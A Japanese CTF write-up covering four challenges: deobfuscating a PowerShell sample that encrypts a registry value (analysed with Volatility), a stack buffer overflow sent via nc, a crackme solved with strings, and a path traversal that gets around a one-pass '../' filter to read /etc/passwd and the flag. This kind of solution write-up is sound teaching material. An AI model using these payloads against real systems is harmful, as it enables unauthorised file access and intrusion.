先ほど同様に、前半を実行して文字列化してくる。
(('if((Get-Date).Month -eq 4 -and (Get-Date).Day -eq 1) {set'+'-ItEm (ikpVariablE:s9qikp+ikpIkikp+i'+'kp1ikp) ( [TYPe](aIF{0}{1}{3}{2}{4}a'+'IF-fikpsYsikp,ikpTEM.tikp,ikpd'+'INikp,'+'ikp'+'ExT.ENcOikp,ikpGikp) '+' ); xUP{B}=(&(ikpgpikp) (((aIF{6}{0}{4}{5}{7}{3}{1}{2}aIF-fikp:xikp,ikptxikp,ikpOECTFikp,ikpfikp,i'+'kpOESoftwaikp,ikpreikp,ikpHKCUikp,ikpxOEMicrosoikp)'+') -REPlace ([cHAr]120+[cHAr]79+[cHAr]69)'+',[cHAr]92)).aIFfJYvieNDaIF;xUP{k}= xUPs9QIK1:'+':aIFaScJYviiaIF.(aIF{1}{0}{2}aI'+'F-fikpetB'+'yikp,ikpG'+'ikp,ikptesikp).Invoke((aIF{1}{'+'0}{2}aIF -fi'+'kp3ikp,ikpf1bbikp,ikprikp));for(xUP{i}=0;xUP{i}-ltxUP{B'+'}.aIFLJYvEnGJYvThaIF;xUP{i}++){xUP{B}[xUP{i}]=xUP{b}[xUP'+'{i}]-bx'+'orxUP{k}[xUP{i}%xUP{k}.aIFLeNJYvGthaIF]};xUP{A} = .(aIF{1}{2}{3}{0}aIF-f ikptikp,ikpNew-ikp,ikpObjikp,ikpecikp) (aIF{0}{6}{3'+'}{5'+'}{1}{11}{8}{4}{7}{9}{10}{2}{12}a'+'IF-f ikpSystemikp,ikpraphy.ikp,ikpcePrikp,ikpecurity.Cryptikp,ikpCikp,ikpogikp,ikp.Sikp,ikpryptikp,ikpsikp,ik'+'poSikp,ikperviikp,'+'ikpAeikp,ikpoviderikp);xUP{S'+'JYvh} = '+'.(aIF{1}{0}{2}aIF-f ikpjeikp,ikpNew-Obikp,ikpctikp) (aIF{8}{10}{4}{7}{0}{1}{3}{9}{5}{6}{2}aIF -fikpcurity.Cryikp,ikpptikp,ikpdikp,i'+'kpogrikp,ikpm.Sikp,ikpy.SHikp,ikpA256Ma'+'nageikp,ikpeikp,ikpSyikp,ikpa'+'phikp,ikpsteikp);xUP{U} = .(aIF{1}{0}{2}aIF-fik'+'pewikp,ikpNikp,ikp-Objectikp) (aIF{2}{4}{3}{0}{1'+'}a'+'I'+'F -fikpncodinikp,ikpgikp,ikpSysteikp,ikp.Te'+'xt.UTF8Eikp,ikpmikp);xUP{H} = x'+'UP{sh'+'}.aIFcJYvOJYvMPuTEJYvhasHaIF(xUP{U}.(aIF{1}{0}{2}aI'+'F-fikpByteikp,ikpGetikp'+',ik'+'psikp).Invok'+'e(xUP{K}));xUP{A}.aIFkJYveyaIF = xUP{H}'+';[byte[]]xUP{'+'Iv} = 0..15'+';xUP{A}.aIFIJYvVaI'+'F ='+' xUP{iV};xUP'+'{e} = xUP{a}.(aIF{4}{3}{1}{0}{2}aIF -f i'+'kpEncrypikp,ikpeikp,ikptorikp,ikpea'+'tikp'+',ikp'+'Crikp).Invoke()'+';xUP{eJYvD} = xUP{e}.(aIF{'+'1}{3}{0}{2}aIF-fikpformFin'+'ikp,ikpTikp,ikpalBlockikp,'+'ikpransikp).Invoke(xUP{b}, 0, xUP{b}.aIFLeNg'+'JYvTHaIF);xUP{Ed};&(ikpspikp) (((aIF{3}{7}{8}{2}{0}{1}{5}{4}{6}{9}aIF-f ikpftikp,ikpwarikp,ikp6Soikp,ikpHKCikp,ikptho6ikp,ikpeho'+'6M'+'icrosofikp,ikp'+'CTikp,ikpUikp,ikp:hoikp,ikpFikp)).aIFreJYvPlAceaIF(([cHaR]104+[cHaR]111+[cHaR]54),[sTRIng][cHaR]92)) -Name (aIF{1}{0'+'}'+'aIF-fikpdikp,ikpfienikp) -Value xUP{ed};.(aIF{'+'2'+'}{0}{1}aIF -f '+'ikpeeikp,ikppikp,ikpStart-Slikp) -Seconds 600;};') -CrEPLACe 'xUP',[ChaR]36 -ReplaCe ([ChaR]97+[ChaR]73+[ChaR]70),[ChaR]34-ReplaCe 'JYv',[ChaR]96-CrEPLACe([ChaR]105+[ChaR]107+[ChaR]112),[ChaR]39)|.( $enV:cOMsPEC[4,15,25]-JOiN'')
iexポイントはここ。
PS> $enV:cOMsPEC[4,15,25]-JOiN'' iex
ということで前半を抜き出して文字列化すると、いよいよ分かりやすい感じで出てくるようになる。
if((Get-Date).Month -eq 4 -and (Get-Date).Day -eq 1) {
set-ItEm ('VariablE:s9q'+'Ik'+'1') ( [TYPe]("{0}{1}{3}{2}{4}"-f'sYs','TEM.t','dIN','ExT.ENcO','G') );
${B}=(&('gp') ((("{6}{0}{4}{5}{7}{3}{1}{2}"-f':x','tx','OECTF','f','OESoftwa','re','HKCU','xOEMicroso')) -REPlace ([cHAr]120+[cHAr]79+[cHAr]69),[cHAr]92))."f`ieND";
${k}= $s9QIK1::"aSc`ii".("{1}{0}{2}"-f'etBy','G','tes').Invoke(("{1}{0}{2}" -f'3','f1bb','r'));
for(${i}=0;${i}-lt${B}."L`EnG`Th";${i}++){
${B}[${i}]=${b}[${i}]-bxor${k}[${i}%${k}."LeN`Gth"]
};
${A} = .("{1}{2}{3}{0}"-f 't','New-','Obj','ec') ("{0}{6}{3}{5}{1}{11}{8}{4}{7}{9}{10}{2}{12}"-f 'System','raphy.','cePr','ecurity.Crypt','C','og','.S','rypt','s','oS','ervi','Ae','ovider');
${S`h} = .("{1}{0}{2}"-f 'je','New-Ob','ct') ("{8}{10}{4}{7}{0}{1}{3}{9}{5}{6}{2}" -f'curity.Cry','pt','d','ogr','m.S','y.SH','A256Manage','e','Sy','aph','ste');
${U} = .("{1}{0}{2}"-f'ew','N','-Object') ("{2}{4}{3}{0}{1}" -f'ncodin','g','Syste','.Text.UTF8E','m');
${H} = ${sh}."c`O`MPuTE`hasH"(${U}.("{1}{0}{2}"-f'Byte','Get','s').Invoke(${K}));
${A}."k`ey" = ${H};
[byte[]]${Iv} = 0..15;
${A}."I`V" = ${iV};
${e} = ${a}.("{4}{3}{1}{0}{2}" -f 'Encryp','e','tor','eat','Cr').Invoke();
${e`D} = ${e}.("{1}{3}{0}{2}"-f'formFin','T','alBlock','rans').Invoke(${b}, 0, ${b}."LeNg`TH");
${Ed};
&('sp') ((("{3}{7}{8}{2}{0}{1}{5}{4}{6}{9}"-f 'ft','war','6So','HKC','tho6','eho6Microsof','CT','U',':ho','F'))."re`PlAce"(([cHaR]104+[cHaR]111+[cHaR]54),[sTRIng][cHaR]92)) -Name ("{1}{0}"-f'd','fien') -Value ${ed};
.("{2}{0}{1}" -f 'ee','p','Start-Sl') -Seconds 600;
};
日付指定で動くようになっている。
難読化処理されているので、変名とか色々しながら整形していく。
if((Get-Date).Month -eq 4 -and (Get-Date).Day -eq 1) {
set-ItEm ('VariablE:Encoding') ( [TYPe]('sYsTEM.tExT.ENcOdING') );
${RawText}=(Get-ItemProperty 'HKCU:\Software\Microsoft\CTF')."fieND";
${Key}= $Encoding::"aScii".('GetBytes').Invoke(('f1bb3r'));
for(${i}=0;${i}-lt${RawText}."LEnGTh";${i}++){
${RawText}[${i}] = ${RawText}[${i}] -bxor ${Key}[${i} % ${Key}."LeNGth"]
};
${AESProvider} = .(New-Object) ('System.Security.Cryptography.AesCryptoServiceProvider');
${SHA256Managed} = .('New-Object') ('System.Security.Cryptography.SHA256Managed');
${UTF8Encoding} = .('New-Object') ('System.Text.UTF8Encoding');
${AESKey} = ${SHA256Managed}."cOMPuTEhasH"(${UTF8Encoding}.('GetBytes').Invoke(${Key}));
${AESProvider}."key" = ${AESKey};
[byte[]]${Iv} = 0..15;
${AESProvider}."IV" = ${iV};
${Encryptor} = ${AESProvider}.('CreateEncryptor').Invoke();
${EncryptedData} = ${Encryptor}.('TransformFinalBlock').Invoke(${RawText}, 0, ${RawText}."LeNgTH");
${EncryptedData};
Set-ItemProperty ('HKCU:\Software\Microsoft\CTF') -Name ('fiend') -Value ${EncryptedData};
.(Start-Sleep) -Seconds 600;
};
HKCU:\Software\Microsoft\CTFのfiendを持ってきて、暗号化して、
レジストリHKCU:\Software\Microsoft\CTFのfiendに入れなおしている。
HKCUなのでユーザーの方のレジストリ。
$ vol.py -f memory.raw windows.registry.hivelist.HiveList Volatility 3 Framework 2.4.1 Progress: 100.00 PDB scanning finished Offset FileFullPath File output ... 0x850e6e280000 \??\C:\Users\User\ntuser.dat Disabled ///
これを使って以下のようにやるとデータが抜き取れる。
$ vol.py -f memory.raw windows.registry.printkey.PrintKey --offset 0x850e6e280000 --key "Software\Microsoft\CTF" Volatility 3 Framework 2.4.1 Progress: 100.00 PDB scanning finished Last Write Time Hive Offset Type Key Name Data Volatile 2023-04-01 08:44:57.000000 0x850e6e280000 Key \??\C:\Users\User\ntuser.dat\Software\Microsoft\CTF Assemblies False 2023-04-01 08:44:57.000000 0x850e6e280000 Key \??\C:\Users\User\ntuser.dat\Software\Microsoft\CTF DirectSwitchHotkeys False 2023-04-01 08:44:57.000000 0x850e6e280000 Key \??\C:\Users\User\ntuser.dat\Software\Microsoft\CTF HiddenDummyLayouts False 2023-04-01 08:44:57.000000 0x850e6e280000 Key \??\C:\Users\User\ntuser.dat\Software\Microsoft\CTF SortOrder False 2023-04-01 08:44:57.000000 0x850e6e280000 Key \??\C:\Users\User\ntuser.dat\Software\Microsoft\CTF TIP False 2023-04-01 08:44:57.000000 0x850e6e280000 REG_BINARY \??\C:\Users\User\ntuser.dat\Software\Microsoft\CTF fiend " 39 da 2a 85 c9 5b 42 17 9.*..[B. 84 11 d8 23 3b 0b f2 0e ...#;... 26 8c 95 89 ff e6 f1 7e &......~ 4b f8 43 42 d0 24 37 70 K.CB.$7p" False
さて、情報が揃ってきた。
AESの各種情報はコレ。
[decrypted] 39 da 2a 85 c9 5b 42 17 84 11 d8 23 3b 0b f2 0e 26 8c 95 89 ff e6 f1 7e 4b f8 43 42 d0 24 37 70 [key] 211 168 191 56 117 145 238 85 188 187 89 40 36 80 50 225 155 56 30 119 211 19 71 173 13 149 209 189 192 152 104 140 を`From Decimal -> To Hex`して以下にする。 d3 a8 bf 38 75 91 ee 55 bc bb 59 28 24 50 32 e1 9b 38 1e 77 d3 13 47 ad 0d 95 d1 bd c0 98 68 8c [iv] 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 をkeyと同様の処理をする。 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f
CyberChefでデコードするとこんな感じ。
3458013156111d0710510745390852150000474c
もうちょっと。
以下のような感じでxor暗号化がかかってる。
${Key}= $Encoding::"aScii".('GetBytes').Invoke(('f1bb3r'));
for(${i}=0;${i}-lt${RawText}."LEnGTh";${i}++){
${RawText}[${i}] = ${RawText}[${i}] -bxor ${Key}[${i} % ${Key}."LeNGth"]
};
f1bb3rでXOR取ってやればフラグ。
[pwn] BOFSec
typedef struct { char name[0x100]; int is_admin; } auth_t; auth_t get_auth(void) { auth_t user = { .is_admin = 0 }; printf("Name: "); scanf("%s", user.name); return user; }
このscanfの部分でBOF(: BufferOverFlow)が発生している。
最終的にはuser.is_adminが0でなければいいので、char name[0x100];の後ろまで書き込みを侵食させてuser.is_adminを非零にする。
適当に'A'を0x104個入れて、全部'A'にしたらフラグがもらえた。
$ python3 -c 'import sys; sys.stdout.buffer.write(b"A" * 0x104)' | nc -q 1 bofsec.2023.ricercactf.com 9001
Name: [+] Authentication successful.
Flag: RicSec{U_und3rst4nd_th3_b4s1c_0f_buff3r_0v3rfl0w}
[rev] crackme
stringsコマンドで中身を眺めてみる。
$ strings * ... The flag is "%s" Password: %99s N1pp0n-Ich!_s3cuR3_p45$w0rD [+] Authenticated [-] Permission denied ...
なんとも魅力的な文字列が見えるので、実際に使ってみるとフラグが得られる。
$ ./crackme
Password: N1pp0n-Ich!_s3cuR3_p45$w0rD
[+] Authenticated
The flag is "RicSec{■■■■■■■■■■■■}"
[web] Cat Café
猫たちが見られるサイトが与えられる。
猫に惑わされず、とりあえずソースコードを眺めると、明らかなパストラバーサルポイントがある。
@app.route('/img') def serve_image(): filename = flask.request.args.get("f", "").replace("../", "") path = f'images/{filename}' if not os.path.isfile(path): return flask.abort(404) return flask.send_file(path)
パラメタfで与えられたパスを結合してファイル参照している。
問題は../が削除されるフィルターが存在している部分である。
削除処理をよくよく見ると、../は一度だけ削除され、かつ、再帰的な削除処理は無いように見えるため
..././のようにすると、1回削除されて最終的に../を残すことができる。
つまり、/img?f=..././..././..././..././..././..././etc/passwdとすると、/etc/passwdが見られることが確認できる。
Dockerfileを見ると、
WORKDIR /home/ctf ... ADD ./flag.txt ./
のような感じになっているので、/home/ctf/flag.txtを参照するべく、
/img?f=..././..././..././..././..././..././home/ctf/flag.txt
とするとフラグが得られる。
